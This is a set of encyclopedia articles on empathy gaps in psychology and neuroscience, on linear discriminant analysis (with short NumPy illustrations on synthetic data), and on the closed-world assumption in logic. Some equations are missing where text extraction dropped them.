One's ability to perspective-take may be limited by one's current emotional state. For example, behavioral economics research has described a number of failures in empathy that occur due to emotional influences on perspective-taking when people make social predictions. People may either fail to accurately predict their own preferences and decisions (intrapersonal empathy gaps), or fail to consider how others' preferences might differ from their own (interpersonal empathy gaps).[8] For example, people not owning a certain good underestimate how attached to that good they would become were they to own it.[9]
In other circumstances, failures in cognitive empathy may occur due to a lack of motivation.[10]For example, people are less likely to take the perspective of outgroup members with whom they disagree.
Affective (i.e. emotional) empathy gaps may describe instances in which an observer and target do not experience similar emotions,[11]or when an observer does not experience anticipated emotional responses toward a target, such as sympathy and compassion.[12]
Certain affective empathy gaps may be driven by a limited ability to share another's emotions. For example, psychopathy is characterized by impairments in emotional empathy.[13]
Individuals may be motivated to avoid empathizing with others' emotions due to the emotional costs of doing so. For example, according to C. D. Batson's model of empathy, empathizing with others may either result in empathic concern (i.e. feelings of warmth and concern for another) or personal distress (i.e. when another's distress causes distress for the self).[14]A trait-level tendency to experience personal distress (vs. empathic concern) may motivate individuals to avoid situations which would require them to empathize with others, and indeed predicts reduced helping behavior.
Humans are less likely to help outgroup members in need, as compared to ingroup members.[15] People are also less likely to value outgroup members' lives as highly as those of ingroup members.[16] These effects are indicative of an ingroup empathy bias, in which people empathize more with ingroup (vs. outgroup) members.
Intergroup empathy gaps are often affective or cognitive in nature, but also extend to other domains such as pain. For example, a great deal of research has demonstrated that people show reduced responses (e.g. neural activity) when observing outgroup (vs. ingroup) members in pain.[17][18][19][20] These effects may occur for real-world social groups such as members of different races. In one study utilizing a minimal groups paradigm (in which groups are randomly assigned, ostensibly based on an arbitrary distinction), individuals also judged the pain of ingroup members to be more intense than that of outgroup members.[21]
Perhaps the most well-known "counter-empathic" emotion—i.e., an emotion that reflects an empathy gap for the target—is schadenfreude, or the experience of pleasure when observing or learning about another's suffering or misfortune.[22] Schadenfreude frequently occurs in intergroup contexts.[23][24] In fact, the two factors that most strongly predict schadenfreude are identification with one's group and the presence of competition between groups in conflict.[25][26] Competition may be explicit; for example, one study found that soccer fans were less likely to help an injured stranger wearing a rival team shirt than someone wearing an ingroup team shirt.[27] However, schadenfreude may also be directed toward members of groups associated with high-status, competitive stereotypes.[28] These findings correspond with the stereotype content model, which proposes that such groups elicit envy, thereby precipitating schadenfreude.
Stress related to the experience of empathy may cause empathic distress fatigue and occupational burnout,[29] particularly among those in the medical profession. Expressing empathy is an important component of patient-centered care, and can be expressed through behaviors such as concern, attentiveness, sharing emotions, vulnerability, understanding, dialogue, reflection, and authenticity.[30] However, expressing empathy can be cognitively and emotionally demanding for providers.[31] Physicians who lack proper support may experience depression and burnout, particularly in the face of extended or frequent experiences of personal distress.
Within the domain of social psychology, "empathy gaps" typically describe breakdowns in empathy toward others (interpersonal empathy gaps). However, research in behavioral economics has also identified a number of intrapersonal empathy gaps (i.e. toward one's self). For example, "hot-cold empathy gaps" describe a breakdown in empathy for one's future self—specifically, a failure to anticipate how one's future affective states will affect one's preferences.[32] Such failures can negatively impact decision-making, particularly in regard to health outcomes. Hot-cold empathy gaps are related to the psychological concepts of affective forecasting and temporal discounting.
Both affective and cognitive empathy gaps can occur due to a breakdown in the process of mentalizing others' states, and such breakdowns in mentalizing may take a number of forms.
Neural evidence also supports the key role of mentalizing in supporting empathic responses, particularly in an intergroup context. For example, a meta-analysis of neuroimaging studies of intergroup social cognition found that thinking about ingroup members (in comparison to outgroup members) was more frequently related to brain regions known to underlie mentalizing.[35]
Gender differences in the experience of empathy have been a subject of debate. In particular, scientists have sought to determine whether observed gender differences in empathy are due to variance in ability, motivation, or both between men and women. Research to date raises the possibility that gender norms regarding the experience and expression of empathy may decrease men's willingness to empathize with others, and therefore their tendency to engage in empathy.
A number of studies, primarily utilizing self-report, have found gender differences in men's and women's empathy. A 1977 review of nine studies found women to be more empathic than men on average.[36] A 1983 review found a similar result, although differences in scores were stronger for self-report, as compared to observational, measures.[37] In recent decades, a number of studies utilizing self-reported empathy have shown gender differences in empathy.[38][39][40] According to the results of a nationally representative survey, men reported less willingness to give money or volunteer time to a poverty relief organization as compared to women, a finding mediated by men's lower self-reported feelings of empathic concern toward others.[41]
However, more recent work has found little evidence that gender differences in self-reported empathy are related to neurophysiological measures (hemodynamic responses and pupil dilation).[42] This finding raises the possibility that self-reported empathy may not be driven by biological differences in responses, but rather by gender differences in willingness to report empathy. Specifically, women may be more likely to report experiencing empathy because it is more gender-normative for women than men.[43] In support of this idea, a study found that manipulating the perceived gender normativity of empathy eliminated gender differences in men's and women's self-reported empathy. Specifically, assigning male and female participants to read a narrative describing fictitious neurological research evidence which claimed that males score higher on measures of empathy eliminated the gender gap in self-reported empathy.[44]
Psychological research has identified a number of trait differences associated with reduced empathic responses.
According to the perception–action model of empathy,[51] perception–action coupling (i.e., the vicarious activation of the neural system for action during the perception of action) allows humans to understand others' actions, intentions, and emotions. According to this theory, when a "subject" individual observes an "object" individual, the object's physical movements and facial expressions activate corresponding neural mechanisms in the subject.[52] That is, by neurally simulating the object's observed states, the subject also experiences these states, the basis of empathy.
The mirror neuron system[53] has been proposed as a neural mechanism supporting perception–action coupling and empathy, although such claims remain a subject of scientific debate. Although the exact (if any) role of mirror neurons in supporting empathy is unclear, evidence suggests that neural simulation (i.e., recreating neural states associated with a process observed in another) may generally support a variety of psychological processes in humans, including disgust,[54] pain,[55] touch,[56] and facial expressions.[57]
Reduced neural simulation of responses to suffering may account in part for observed empathy gaps, particularly in an intergroup context. This possibility is supported by research demonstrating that people show reduced neural activity when they witness ethnic outgroup (vs. ingroup) members in physical or emotional pain.[17][18] In one study, Chinese and Caucasian participants viewed videos of Chinese and Caucasian targets, who displayed neutral facial expressions as they received either painful or non-painful stimulation to their cheeks.[17] Witnessing racial ingroup faces receive painful stimulation increased activity in the dorsal anterior cingulate cortex and anterior insula (two regions which generally activate during the experience of pain). However, these responses were diminished toward outgroup members in pain. These results replicated among White Italian and Black African participants.[19] Additionally, EEG work has shown reduced neural simulation of movement (in primary motor cortex) for outgroup members, compared to ingroup members.[20] This effect was magnified by prejudice and toward disliked groups (i.e. South Asians, Blacks, and East Asians).
A great deal of social neuroscience research has been conducted to investigate the social functions of the hormone oxytocin,[58] including its role in empathy. Generally speaking, oxytocin is associated with cooperation between individuals (in both humans and non-human animals). However, these effects interact with group membership in intergroup settings: oxytocin is associated with increased bonding with ingroup, but not outgroup, members, and may thereby contribute to ingroup favoritism and intergroup empathy bias.[59] However, in one study of Israelis and Palestinians, intranasal oxytocin administration improved opposing partisans' empathy for outgroup members by increasing the salience of their pain.[60]
In addition to temporary changes in oxytocin levels, the influence of oxytocin on empathic responses may also be influenced by an oxytocin receptor gene polymorphism,[61]such that certain individuals may differ in the extent to which oxytocin promotes ingroup favoritism.
A number of studies have been conducted to identify the neural regions implicated in intergroup empathy biases.[62][33][63]This work has highlighted candidate regions supporting psychological processes such as mentalizing for ingroup members, deindividuation of outgroup members, and the pleasure associated with the experience of schadenfreude.
A meta-analysis of 50 fMRI studies of intergroup social cognition found more consistent activation in dorsomedial prefrontal cortex (dmPFC) during ingroup (vs. outgroup) social cognition.[35] dmPFC has previously been linked to the ability to infer others' mental states,[64][65][66] which suggests that individuals may be more likely to engage in mentalizing for ingroup (as compared to outgroup) members. dmPFC activity has also been linked to prosocial behavior;[67][68] thus, dmPFC's association with cognition about ingroup members suggests a potential neurocognitive mechanism underlying ingroup favoritism.
Activation patterns in the anterior insula (AI) have been observed when thinking about both ingroup and outgroup members. For example, greater activity in the anterior insula has been observed when participants view ingroup members on a sports team receiving pain, compared to outgroup members receiving pain.[69][70] In contrast, the meta-analysis referenced previously[35] found that anterior insula activation was more reliably related to social cognition about outgroup members.
These seemingly divergent results may be due in part to functional differences between anatomic subregions of the anterior insula. Meta-analyses have identified two distinct subregions of the anterior insula: ventral AI, which is linked to emotional and visceral experiences (e.g. subjective arousal); and dorsal AI, which has been associated with exogenous attention processes such as attention orientation, salience detection, and task performance monitoring.[71][72][73] Therefore, anterior insula activation may occur more often when thinking about outgroup members because doing so is more attentionally demanding than thinking about ingroup members.[35]
Lateralization of function within the anterior insula may also help account for divergent results, due to differences in connectivity between left and right AI. The right anterior insula has greater connectivity with regions supporting attentional orientation and arousal (e.g. postcentral gyrus and supramarginal gyrus), compared to the left anterior insula, which has greater connectivity with regions involved in perspective-taking and cognitive motor control (e.g. dmPFC and superior frontal gyrus).[74] The previously referenced meta-analysis found right lateralization of anterior insula for outgroup compared to ingroup processing.[35] These findings raise the possibility that when thinking about outgroup members, individuals may use their attention to focus on targets' salient outgroup status, as opposed to thinking about the outgroup member as an individual. In contrast, the meta-analysis found left lateralization of anterior insula activity for thinking about ingroup compared to outgroup members. This finding suggests that left anterior insula may help support perspective-taking and mentalizing about ingroup members, and thinking about them in an individuated way. However, these possibilities are speculative, and lateralization may vary due to characteristics such as age, gender, and other individual differences, which should be accounted for in future research.[75][74]
A number of fMRI studies have attempted to identify the neural activation patterns underlying the experience of intergroup schadenfreude, particularly toward outgroup members in pain. These studies have found increased activation in the ventral striatum, a region related to reward processing and pleasure.[76]
Breakdowns in empathy may reduce helping behavior,[77][78]a phenomenon illustrated by theidentifiable victim effect. Specifically, humans are less likely to assist others who are not identifiable on an individual level.[79]A related concept is psychological distance—that is, we are less likely to help those who feel more psychologically distant from us.[80]
Reduced empathy for outgroup members is associated with a reduction in willingness to entertain another's points of view, the likelihood of ignoring a customer's complaints, the likelihood of helping others during a natural disaster, and the chance that one opposes social programs designed to benefit disadvantaged individuals.[81][71]
Empathy gaps may contribute to prejudicial attitudes and behavior. However, training people in perspective-taking, for example by providing instructions about how to take an outgroup member's perspective, has been shown to increase intergroup helping and the recognition of group disparities.[82]Perspective-taking interventions are more likely to be effective when a multicultural approach is used (i.e., an approach that appreciates intergroup differences), as opposed to a "colorblind" approach (e.g. an approach that attempts to emphasize a shared group identity).[82][83][84]
|
https://en.wikipedia.org/wiki/Empathy_gap
|
Linear discriminant analysis(LDA),normal discriminant analysis(NDA),canonical variates analysis(CVA), ordiscriminant function analysisis a generalization ofFisher's linear discriminant, a method used instatisticsand other fields, to find alinear combinationof features that characterizes or separates two or more classes of objects or events. The resulting combination may be used as alinear classifier, or, more commonly, fordimensionality reductionbefore laterclassification.
LDA is closely related toanalysis of variance(ANOVA) andregression analysis, which also attempt to express onedependent variableas a linear combination of other features or measurements.[2][3]However, ANOVA usescategoricalindependent variablesand acontinuousdependent variable, whereas discriminant analysis has continuousindependent variablesand a categorical dependent variable (i.e.the class label).[4]Logistic regressionandprobit regressionare more similar to LDA than ANOVA is, as they also explain a categorical variable by the values of continuous independent variables. These other methods are preferable in applications where it is not reasonable to assume that the independent variables are normally distributed, which is a fundamental assumption of the LDA method.
LDA is also closely related toprincipal component analysis(PCA) andfactor analysisin that they both look for linear combinations of variables which best explain the data.[5]LDA explicitly attempts to model the difference between the classes of data. PCA, in contrast, does not take into account any difference in class, and factor analysis builds the feature combinations based on differences rather than similarities. Discriminant analysis is also different from factor analysis in that it is not an interdependence technique: a distinction between independent variables and dependent variables (also called criterion variables) must be made.
LDA works when the measurements made on independent variables for each observation are continuous quantities. When dealing with categorical independent variables, the equivalent technique is discriminant correspondence analysis.[6][7]
Discriminant analysis is used when groups are known a priori (unlike in cluster analysis). Each case must have a score on one or more quantitative predictor measures, and a score on a group measure.[8] In simple terms, discriminant function analysis is classification: the act of distributing things into groups, classes or categories of the same type.
The originaldichotomousdiscriminant analysis was developed by SirRonald Fisherin 1936.[9]It is different from anANOVAorMANOVA, which is used to predict one (ANOVA) or multiple (MANOVA) continuous dependent variables by one or more independent categorical variables. Discriminant function analysis is useful in determining whether a set of variables is effective in predicting category membership.[10]
Consider a set of observations $\vec{x}$ (also called features, attributes, variables or measurements) for each sample of an object or event with known class $y$. This set of samples is called the training set in a supervised learning context. The classification problem is then to find a good predictor for the class $y$ of any sample of the same distribution (not necessarily from the training set) given only an observation $\vec{x}$.[11]: 338
LDA approaches the problem by assuming that the conditional probability density functions $p(\vec{x}|y=0)$ and $p(\vec{x}|y=1)$ are both normal distributions with mean and covariance parameters $(\vec{\mu}_0, \Sigma_0)$ and $(\vec{\mu}_1, \Sigma_1)$, respectively. Under this assumption, the Bayes-optimal solution is to predict points as being from the second class if the log of the likelihood ratios is bigger than some threshold $T$, so that:

$(\vec{x}-\vec{\mu}_0)^{T}\Sigma_0^{-1}(\vec{x}-\vec{\mu}_0) + \ln|\Sigma_0| - (\vec{x}-\vec{\mu}_1)^{T}\Sigma_1^{-1}(\vec{x}-\vec{\mu}_1) - \ln|\Sigma_1| > T$
Without any further assumptions, the resulting classifier is referred to asquadratic discriminant analysis(QDA).
LDA instead makes the additional simplifying homoscedasticity assumption (i.e. that the class covariances are identical, so $\Sigma_0 = \Sigma_1 = \Sigma$) and that the covariances have full rank.
In this case, several terms cancel:
and the above decision criterion
becomes a threshold on thedot product
for some threshold constantc, where
This means that the criterion of an input $\vec{x}$ being in a class $y$ is purely a function of this linear combination of the known observations.
It is often useful to see this conclusion in geometrical terms: the criterion of an input $\vec{x}$ being in a class $y$ is purely a function of the projection of the multidimensional-space point $\vec{x}$ onto the vector $\vec{w}$ (thus, we only consider its direction). In other words, the observation belongs to $y$ if the corresponding $\vec{x}$ is located on a certain side of a hyperplane perpendicular to $\vec{w}$. The location of the plane is defined by the threshold $c$.
The assumptions of discriminant analysis are the same as those for MANOVA. The analysis is quite sensitive to outliers and the size of the smallest group must be larger than the number of predictor variables.[8]
It has been suggested that discriminant analysis is relatively robust to slight violations of these assumptions,[12]and it has also been shown that discriminant analysis may still be reliable when using dichotomous variables (where multivariate normality is often violated).[13]
Discriminant analysis works by creating one or more linear combinations of predictors, yielding a new latent variable for each function. These functions are called discriminant functions. The number of possible functions is either $N_g - 1$, where $N_g$ is the number of groups, or $p$ (the number of predictors), whichever is smaller. The first function created maximizes the differences between groups on that function. The second function also maximizes differences on that function, but must not be correlated with the previous function. This continues with subsequent functions, with the requirement that each new function not be correlated with any of the previous functions.
Given group $j$, with $\mathbb{R}_j$ sets of sample space, there is a discriminant rule such that if $x \in \mathbb{R}_j$, then $x \in j$. Discriminant analysis then finds "good" regions of $\mathbb{R}_j$ to minimize classification error, leading to a high percentage of correct classifications in the classification table.[14]
Each function is given a discriminant score to determine how well it predicts group placement.
An eigenvalue in discriminant analysis is the characteristic root of each function. It is an indication of how well that function differentiates the groups, where the larger the eigenvalue, the better the function differentiates.[8] This, however, should be interpreted with caution, as eigenvalues have no upper limit.[10][8] The eigenvalue can be viewed as a ratio of $SS_{\text{between}}$ and $SS_{\text{within}}$, as in ANOVA when the dependent variable is the discriminant function and the groups are the levels of the independent variable.[10] This means that the largest eigenvalue is associated with the first function, the second largest with the second, and so on.
Some suggest the use of eigenvalues as effect size measures; however, this is generally not supported.[10] Instead, the canonical correlation is the preferred measure of effect size. It is similar to the eigenvalue, but is the square root of the ratio of $SS_{\text{between}}$ and $SS_{\text{total}}$. It is the correlation between groups and the function.[10] Another popular measure of effect size is the percent of variance explained by each function, calculated as $(\lambda_x / \Sigma\lambda_i) \times 100$, where $\lambda_x$ is the eigenvalue for the function and $\Sigma\lambda_i$ is the sum of all eigenvalues. This tells us how strong the prediction is for that particular function compared to the others.[10] Percent correctly classified can also be analyzed as an effect size. The kappa value can describe this while correcting for chance agreement; kappa normalizes across all categories rather than being biased by significantly well or poorly performing classes.[10][17]
Canonical discriminant analysis (CDA) finds axes ($k - 1$ canonical coordinates, $k$ being the number of classes) that best separate the categories. These linear functions are uncorrelated and define, in effect, an optimal $k - 1$ dimensional space through the $n$-dimensional cloud of data that best separates (the projections in that space of) the $k$ groups. See "Multiclass LDA" below for details.
Because LDA uses canonical variates, it was initially often referred to as the "method of canonical variates"[18] or canonical variates analysis (CVA).[19]
The termsFisher's linear discriminantandLDAare often used interchangeably, althoughFisher'soriginal article[2]actually describes a slightly different discriminant, which does not make some of the assumptions of LDA such asnormally distributedclasses or equal classcovariances.
Suppose two classes of observations have means $\vec{\mu}_0, \vec{\mu}_1$ and covariances $\Sigma_0, \Sigma_1$. Then the linear combination of features $\vec{w}^{T}\vec{x}$ will have means $\vec{w}^{T}\vec{\mu}_i$ and variances $\vec{w}^{T}\Sigma_i\vec{w}$ for $i = 0, 1$. Fisher defined the separation between these two distributions to be the ratio of the variance between the classes to the variance within the classes:

$S = \frac{\sigma_{\text{between}}^{2}}{\sigma_{\text{within}}^{2}} = \frac{(\vec{w}\cdot(\vec{\mu}_1-\vec{\mu}_0))^{2}}{\vec{w}^{T}(\Sigma_0+\Sigma_1)\vec{w}}$
This measure is, in some sense, a measure of the signal-to-noise ratio for the class labelling. It can be shown that the maximum separation occurs when

$\vec{w} \propto (\Sigma_0+\Sigma_1)^{-1}(\vec{\mu}_1-\vec{\mu}_0)$
When the assumptions of LDA are satisfied, the above equation is equivalent to LDA.
Note that the vector $\vec{w}$ is the normal to the discriminant hyperplane. For example, in a two-dimensional problem, the line that best divides the two groups is perpendicular to $\vec{w}$.
Generally, the data points to be discriminated are projected onto $\vec{w}$; the threshold that best separates the data is then chosen from analysis of the one-dimensional distribution. There is no general rule for the threshold. However, if projections of points from both classes exhibit approximately the same distributions, a good choice would be the hyperplane between the projections of the two means, $\vec{w} \cdot \vec{\mu}_0$ and $\vec{w} \cdot \vec{\mu}_1$. In this case the parameter $c$ in the threshold condition $\vec{w} \cdot \vec{x} > c$ can be found explicitly:

$c = \vec{w}\cdot\tfrac{1}{2}(\vec{\mu}_0+\vec{\mu}_1)$
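As a concrete illustration, the projection-and-threshold rule above can be sketched in Python with NumPy. The two Gaussian classes below are synthetic data invented for the example; the sketch estimates Fisher's direction $\vec{w} \propto (\Sigma_0+\Sigma_1)^{-1}(\vec{\mu}_1-\vec{\mu}_0)$ from samples and thresholds at the midpoint of the projected means.

```python
import numpy as np

rng = np.random.default_rng(0)
# Two synthetic Gaussian classes sharing the same covariance (illustrative only).
mu0, mu1 = np.array([0.0, 0.0]), np.array([2.0, 2.0])
cov = np.array([[1.0, 0.3], [0.3, 1.0]])
X0 = rng.multivariate_normal(mu0, cov, 200)
X1 = rng.multivariate_normal(mu1, cov, 200)

# Fisher's direction: w ∝ (Σ0 + Σ1)^(-1) (μ1 - μ0), using sample estimates.
m0, m1 = X0.mean(axis=0), X1.mean(axis=0)
Sw = np.cov(X0, rowvar=False) + np.cov(X1, rowvar=False)
w = np.linalg.solve(Sw, m1 - m0)

# Threshold c halfway between the projected means (reasonable when the
# projected class distributions are similar, as the text notes).
c = w @ (m0 + m1) / 2
pred1 = X1 @ w > c    # class-1 points projected above the threshold
pred0 = X0 @ w <= c   # class-0 points projected below it
accuracy = (pred0.sum() + pred1.sum()) / 400
```

Because the class means are well separated relative to the shared covariance, most points fall on the correct side of the hyperplane.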
Otsu's methodis related to Fisher's linear discriminant, and was created to binarize the histogram of pixels in a grayscale image by optimally picking the black/white threshold that minimizes intra-class variance and maximizes inter-class variance within/between grayscales assigned to black and white pixel classes.
In the case where there are more than two classes, the analysis used in the derivation of the Fisher discriminant can be extended to find a subspace which appears to contain all of the class variability.[20] This generalization is due to C. R. Rao.[21] Suppose that each of $C$ classes has a mean $\mu_i$ and the same covariance $\Sigma$. Then the between-class scatter may be defined as the sample covariance of the class means:

$\Sigma_b = \frac{1}{C}\sum_{i=1}^{C}(\mu_i-\mu)(\mu_i-\mu)^{T}$
where $\mu$ is the mean of the class means. The class separation in a direction $\vec{w}$ in this case will be given by

$S = \frac{\vec{w}^{T}\Sigma_b\vec{w}}{\vec{w}^{T}\Sigma\vec{w}}$
This means that when $\vec{w}$ is an eigenvector of $\Sigma^{-1}\Sigma_b$, the separation will be equal to the corresponding eigenvalue.
If $\Sigma^{-1}\Sigma_b$ is diagonalizable, the variability between features will be contained in the subspace spanned by the eigenvectors corresponding to the $C - 1$ largest eigenvalues (since $\Sigma_b$ is of rank $C - 1$ at most). These eigenvectors are primarily used in feature reduction, as in PCA. The eigenvectors corresponding to the smaller eigenvalues tend to be very sensitive to the exact choice of training data, and it is often necessary to use regularisation as described in the next section.
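The multiclass construction can be sketched numerically. The code below (Python with NumPy; the three-class Gaussian data is synthetic and purely illustrative) builds $\Sigma_b$ as the sample covariance of the class means, estimates the shared within-class covariance, and takes the top $C-1$ eigenvectors of $\Sigma^{-1}\Sigma_b$ as the discriminant subspace.

```python
import numpy as np

rng = np.random.default_rng(1)
C, d = 3, 4
true_means = rng.normal(size=(C, d)) * 3
X = np.vstack([rng.multivariate_normal(m, np.eye(d), 100) for m in true_means])
y = np.repeat(np.arange(C), 100)

# Between-class scatter: sample covariance of the class means.
class_means = np.array([X[y == c].mean(axis=0) for c in range(C)])
Sb = np.cov(class_means, rowvar=False)
# Shared within-class covariance estimate (classes assumed homoscedastic).
Sw = sum(np.cov(X[y == c], rowvar=False) for c in range(C)) / C

# Eigen-decompose Σ^{-1} Σb; at most C - 1 eigenvalues are nonzero,
# since Sb has rank at most C - 1.
evals, evecs = np.linalg.eig(np.linalg.solve(Sw, Sb))
order = np.argsort(evals.real)[::-1]
W = evecs.real[:, order[:C - 1]]   # discriminant subspace, shape (d, C-1)
Z = X @ W                          # data projected for feature reduction
```

Note that only $C - 1 = 2$ of the four eigenvalues are (numerically) nonzero, confirming the rank bound stated above.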
If classification is required, instead of dimension reduction, there are a number of alternative techniques available. For instance, the classes may be partitioned, and a standard Fisher discriminant or LDA used to classify each partition. A common example of this is "one against the rest", where the points from one class are put in one group and everything else in the other, and then LDA applied. This results in $C$ classifiers, whose results are combined. Another common method is pairwise classification, where a new classifier is created for each pair of classes (giving $C(C-1)/2$ classifiers in total), with the individual classifiers combined to produce a final classification.
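A minimal sketch of the one-against-the-rest scheme (Python with NumPy; the three synthetic Gaussian classes and the argmax-of-margins combination rule are illustrative choices, not prescribed by the text):

```python
import numpy as np

rng = np.random.default_rng(2)
means = [np.array([0.0, 0.0]), np.array([4.0, 0.0]), np.array([0.0, 4.0])]
X = np.vstack([rng.multivariate_normal(m, np.eye(2), 100) for m in means])
y = np.repeat(np.arange(3), 100)

# One against the rest: one two-class Fisher discriminant per class (C = 3).
scores = np.empty((len(X), 3))
for c in range(3):
    A, B = X[y == c], X[y != c]                 # class c vs. everything else
    Sw = np.cov(A, rowvar=False) + np.cov(B, rowvar=False)
    w = np.linalg.solve(Sw, A.mean(axis=0) - B.mean(axis=0))
    thresh = w @ (A.mean(axis=0) + B.mean(axis=0)) / 2
    scores[:, c] = X @ w - thresh               # signed margin toward class c

# Combine the C classifiers: assign each point to the largest margin.
pred = scores.argmax(axis=1)
accuracy = (pred == y).mean()
```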
The typical implementation of the LDA technique requires that all the samples are available in advance. However, there are situations where the entire data set is not available and the input data are observed as a stream. In this case, it is desirable for the LDA feature extraction to have the ability to update the computed LDA features by observing the new samples without running the algorithm on the whole data set. For example, in many real-time applications such as mobile robotics or on-line face recognition, it is important to update the extracted LDA features as soon as new observations are available. An LDA feature extraction technique that can update the LDA features by simply observing new samples is anincremental LDA algorithm, and this idea has been extensively studied over the last two decades.[22]Chatterjee and Roychowdhury proposed an incremental self-organized LDA algorithm for updating the LDA features.[23]In other work, Demir and Ozmehmet proposed online local learning algorithms for updating LDA features incrementally using error-correcting and the Hebbian learning rules.[24]Later, Aliyari et al. derived fast incremental algorithms to update the LDA features by observing the new samples.[22]
In practice, the class means and covariances are not known. They can, however, be estimated from the training set. Either themaximum likelihood estimateor themaximum a posterioriestimate may be used in place of the exact value in the above equations. Although the estimates of the covariance may be considered optimal in some sense, this does not mean that the resulting discriminant obtained by substituting these values is optimal in any sense, even if the assumption of normally distributed classes is correct.
Another complication in applying LDA and Fisher's discriminant to real data occurs when the number of measurements of each sample (i.e., the dimensionality of each data vector) exceeds the number of samples in each class.[5]In this case, the covariance estimates do not have full rank, and so cannot be inverted. There are a number of ways to deal with this. One is to use apseudo inverseinstead of the usual matrix inverse in the above formulae. However, better numeric stability may be achieved by first projecting the problem onto the subspace spanned byΣb{\displaystyle \Sigma _{b}}.[25]Another strategy to deal with small sample size is to use ashrinkage estimatorof the covariance matrix, which
can be expressed mathematically as

$\Sigma_{\text{reg}} = (1-\lambda)\Sigma + \lambda I,$

where $I$ is the identity matrix, and $\lambda$ is the shrinkage intensity or regularisation parameter.
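A small numerical sketch of why shrinkage helps (Python with NumPy; the linear shrinkage-toward-identity form $(1-\lambda)\hat\Sigma + \lambda I$ and the sample sizes are illustrative assumptions): with fewer samples than dimensions the sample covariance is rank-deficient, but the shrunk estimate is full rank and safely invertible.

```python
import numpy as np

def shrink_covariance(X, lam):
    """Shrinkage estimator (1 - λ) Σ̂ + λ I, with λ the regularisation parameter."""
    S = np.cov(X, rowvar=False)
    return (1 - lam) * S + lam * np.eye(S.shape[0])

rng = np.random.default_rng(3)
X = rng.normal(size=(5, 20))        # fewer samples (5) than dimensions (20)
S = np.cov(X, rowvar=False)         # rank-deficient: cannot be inverted
S_reg = shrink_covariance(X, 0.1)   # full rank; smallest eigenvalue ≥ λ
```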
This leads to the framework of regularized discriminant analysis[26]or shrinkage discriminant analysis.[27]
Also, in many practical cases linear discriminants are not suitable. LDA and Fisher's discriminant can be extended for use in non-linear classification via thekernel trick. Here, the original observations are effectively mapped into a higher dimensional non-linear space. Linear classification in this non-linear space is then equivalent to non-linear classification in the original space. The most commonly used example of this is thekernel Fisher discriminant.
LDA can be generalized to multiple discriminant analysis, where $c$ becomes a categorical variable with $N$ possible states, instead of only two. Analogously, if the class-conditional densities $p(\vec{x} \mid c=i)$ are normal with shared covariances, the sufficient statistic for $P(c \mid \vec{x})$ is the set of $N$ projections onto the subspace spanned by the $N$ means, affine projected by the inverse covariance matrix. These projections can be found by solving a generalized eigenvalue problem, where the numerator is the covariance matrix formed by treating the means as the samples, and the denominator is the shared covariance matrix. See "Multiclass LDA" above for details.
In addition to the examples given below, LDA is applied inpositioningandproduct management.
Inbankruptcy predictionbased on accounting ratios and other financial variables, linear discriminant analysis was the first statistical method applied to systematically explain which firms entered bankruptcy vs. survived. Despite limitations including known nonconformance of accounting ratios to the normal distribution assumptions of LDA,Edward Altman's1968 model[28]is still a leading model in practical applications.[29][30][31]
In computerisedface recognition, each face is represented by a large number of pixel values. Linear discriminant analysis is primarily used here to reduce the number of features to a more manageable number before classification. Each of the new dimensions is a linear combination of pixel values, which form a template. The linear combinations obtained using Fisher's linear discriminant are calledFisher faces, while those obtained using the relatedprincipal component analysisare calledeigenfaces.
Inmarketing, discriminant analysis was once often used to determine the factors which distinguish different types of customers and/or products on the basis of surveys or other forms of collected data.Logistic regressionor other methods are now more commonly used. The use of discriminant analysis in marketing can be described by the following steps:
The main application of discriminant analysis in medicine is the assessment of severity state of a patient and prognosis of disease outcome. For example, during retrospective analysis, patients are divided into groups according to severity of disease – mild, moderate, and severe form. Then results of clinical and laboratory analyses are studied to reveal statistically different variables in these groups. Using these variables, discriminant functions are built to classify disease severity in future patients. Additionally, Linear Discriminant Analysis (LDA) can help select more discriminative samples for data augmentation, improving classification performance.[32]
In biology, similar principles are used in order to classify and define groups of different biological objects, for example, to define phage types of Salmonella enteritidis based on Fourier transform infrared spectra,[33]to detect animal source ofEscherichia colistudying its virulence factors[34]etc.
This method can be used to separate the alteration zones. For example, when different data from various zones are available, discriminant analysis can find the pattern within the data and classify it effectively.[35]
Discriminant function analysis is very similar to logistic regression, and both can be used to answer the same research questions.[10] Logistic regression does not have as many assumptions and restrictions as discriminant analysis. However, when discriminant analysis's assumptions are met, it is more powerful than logistic regression.[36] Unlike logistic regression, discriminant analysis can be used with small sample sizes. It has been shown that when sample sizes are equal and homogeneity of variance/covariance holds, discriminant analysis is more accurate.[8] Despite all these advantages, logistic regression has nonetheless become the common choice, since the assumptions of discriminant analysis are rarely met.[9][8]
Geometric anomalies in higher dimensions lead to the well-known curse of dimensionality. Nevertheless, proper utilization of concentration of measure phenomena can make computation easier.[37] An important case of these blessing of dimensionality phenomena was highlighted by Donoho and Tanner: if a sample is essentially high-dimensional, then each point can be separated from the rest of the sample by a linear inequality, with high probability, even for exponentially large samples.[38] These linear inequalities can be selected in the standard (Fisher's) form of the linear discriminant for a rich family of probability distributions.[39] In particular, such theorems are proven for log-concave distributions including the multidimensional normal distribution (the proof is based on the concentration inequalities for log-concave measures[40]) and for product measures on a multidimensional cube (this is proven using Talagrand's concentration inequality for product probability spaces). Data separability by classical linear discriminants simplifies the problem of error correction for artificial intelligence systems in high dimension.[41]
|
https://en.wikipedia.org/wiki/Discriminant_function
|
The closed-world assumption (CWA), in a formal system of logic used for knowledge representation, is the presumption that a statement that is true is also known to be true. Conversely, what is not currently known to be true is false. The same name also refers to a logical formalization of this assumption by Raymond Reiter.[1] The opposite of the closed-world assumption is the open-world assumption (OWA), which states that lack of knowledge does not imply falsity. The decision between CWA and OWA determines the understanding of the actual semantics of a conceptual expression given the same notation of concepts. A successful formalization of natural language semantics usually cannot avoid an explicit revelation of whether the implicit logical background is based on CWA or OWA.
Negation as failureis related to the closed-world assumption, as it amounts to believing false every predicate that cannot be proved to be true.
In the context ofknowledge management, the closed-world assumption is used in at least two situations: (1) when the knowledge base is known to be complete (e.g., a corporate database containing records for every employee), and (2) when the knowledge base is known to be incomplete but a "best" definite answer must be derived from incomplete information. For example, if adatabasecontains the following table reporting editors who have worked on a given article, a query on the people not having edited the article on Formal Logic is usually expected to return "Sarah Johnson".
In the closed-world assumption, the table is assumed to becomplete(it lists all editor–article relationships), and Sarah Johnson is the only editor who has not edited the article on Formal Logic. In contrast, with the open-world assumption the table is not assumed to contain all editor–article tuples, and the answer to who has not edited the Formal Logic article is unknown. There is an unknown number of editors not listed in the table, and an unknown number of articles edited by Sarah Johnson that are also not listed in the table.
